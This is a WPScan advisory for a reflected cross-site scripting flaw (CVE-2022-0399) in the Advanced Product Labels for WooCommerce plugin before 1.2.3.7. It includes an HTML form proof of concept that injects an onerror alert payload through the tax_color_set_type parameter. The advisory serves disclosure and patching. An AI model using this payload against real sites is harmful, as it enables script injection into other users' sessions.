WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Advanced Product Labels for WooCommerce < 1.2.3.7 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action's response, leading to a Reflected Cross-Site Scripting

Proof of Concept

As any authenticated user:

<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=berocket_apl_color_listener" method="POST">
        <input type="text" value='"><img src onerror=alert(/XSS/)>' name="tax_color_set_type">
        <input type="submit" value="Send">
    </form>
</html>

Affects Plugins

advanced-product-labels-for-woocommerce
Fixed in version 1.2.3.7

References

CVE
CVE-2022-0399
URL
https://plugins.trac.wordpress.org/changeset/2678919

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
5e5fdcf4-ec2b-4e73-8009-05606b2d5164

Timeline

Publicly Published

2022-02-15 (about 11 months ago)

Added

2022-02-15 (about 11 months ago)

Last Updated

2022-04-08 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin